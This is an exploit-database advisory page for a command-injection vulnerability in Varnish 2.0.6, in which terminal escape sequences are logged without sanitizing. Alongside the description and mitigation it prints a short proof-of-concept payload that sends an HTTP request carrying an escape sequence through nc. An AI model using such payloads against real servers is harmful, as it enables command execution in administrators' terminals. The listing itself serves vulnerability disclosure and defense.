header-logo
Suggest Exploit
vendor:
Varnish
by:
9.8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: Varnish
Affected Version From: 2.0.6
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:varnish-cache:varnish:2.0.6
Metasploit:
Other Scripts:
Platforms Tested:

Command Injection Vulnerability in Varnish

Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. Attackers can exploit this issue to execute arbitrary commands in a terminal.

Mitigation:

Update to a patched version of Varnish. Sanitize and validate user-supplied input before using it in logfiles.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37713/info

Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.

Attackers can exploit this issue to execute arbitrary commands in a terminal.

Varnish 2.0.6 is vulnerable; other versions may also be affected. 

The following example is available:

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload